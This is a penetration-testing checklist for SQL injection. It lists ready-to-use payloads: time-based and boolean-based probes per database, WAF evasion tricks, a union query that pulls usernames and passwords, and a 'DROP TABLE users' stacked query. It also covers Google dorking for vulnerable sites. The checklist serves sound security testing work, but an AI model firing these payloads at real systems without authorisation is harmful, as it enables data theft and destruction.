-
Entry Point Detection
- Identify potential SQL injection entry points in the application.
- Check input fields, URL parameters, headers, cookies, and other data entry points.
-
Testing Techniques
- Test with simple characters (e.g., ', ", ;, --, /* */) to see basic SQL injection response.
- Use multiple encoding layers (e.g., URL encoding, Base64) to assess filter bypass capabilities.
- Try merging characters to form unexpected SQL queries (e.g.,
' OR 1=1 --). - Perform logical testing to see how the application handles SQL logic (e.g.,
AND 1=1,OR 1=1). - Include special characters (e.g., @, #, $, ^, *, (, )) to test input sanitization processes.
- Test for second-order SQL injection by modifying input that is later processed in SQL queries.
-
Detection and Evasion
- Automated SQL Injection Detection & WAF Evasion Techniques
- Run SQL injection scanner on all requests to detect vulnerabilities.
- Attempt to bypass Web Application Firewalls (WAF) with advanced techniques:
- Using Null byte before SQL query.
- Using SQL inline comment sequence (--, /* */).
- Employ URL encoding to obfuscate malicious inputs.
- Alternate between changing cases (uppercase/lowercase) to evade case-sensitive filters.
- Use SQLMAP tamper scripts to automate evasion tactics.
- Use time delays and error messages to infer SQL injection (e.g.,
AND 1=BENCHMARK(10000000,MD5(1))).
- Time-Based SQL Injection:
- Oracle: Test with dbms_pipe.receive_message(('a'), 10).
- Microsoft: Use WAITFOR DELAY '0:0:10'.
- PostgreSQL: Execute SELECT pg_sleep(10).
- MySQL: Perform SELECT sleep(10).
- Conditional Delays for Blind SQL Injection:
- Oracle: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'), 10) ELSE NULL END FROM dual.
- Microsoft: IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'.
- PostgreSQL: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END.
- MySQL: SELECT IF(YOUR-CONDITION-HERE, sleep(10), 'a').
-
Boolean-Based SQL Injection:
- Oracle: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'true' ELSE 'false' END FROM dual.
- Microsoft: IF (YOUR-CONDITION-HERE) SELECT 'true' ELSE SELECT 'false'.
- PostgreSQL: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'true' ELSE 'false' END.
- MySQL: SELECT IF(YOUR-CONDITION-HERE, 'true', 'false').
-
Error-Based SQL Injection
- General: Inject payloads to generate SQL errors (e.g.,
' OR 1=1 --, ").
- General: Inject payloads to generate SQL errors (e.g.,
-
General SQL Injection Testing
- Test SQL Injection on authentication forms (
login,registration). - Test SQL Injection on the search bar.
- Test SQL Injection on editable characteristics (
profile updates,comments). - Use tools like
SQLmap,Burp Suite, orHackbar. - Use Google dorks to find the SQL keywords and potential vulnerable sites.
- Test all types of SQL Injection (
GET,POST,COOKIE,HEADER). - Try SQL Injection with various methods like null bytes, URL encoding, case changes, and tamper scripts.
- Try SQL Injection with SQL Time delay and conditional delays.
- Try Boolean-based, Time-based, and Error-based SQL Injection techniques.
- Test for out-of-band SQL injection to capture data sent to an external server.
- Test SQL Injection on authentication forms (
- Automated SQL Injection Detection & WAF Evasion Techniques
-
Techniques
- Test for stacked queries (e.g., ;
DROP TABLE users;--). - Check for union-based SQL injection (e.g.,
UNION SELECT NULL, username, password FROM users--). - Test for subqueries and nested queries.
- Assess the application's use of parameterized queries and stored procedures.
- Verify if error handling reveals sensitive database information.
- Perform fuzz testing on all SQL query parameters.
- Test for stacked queries (e.g., ;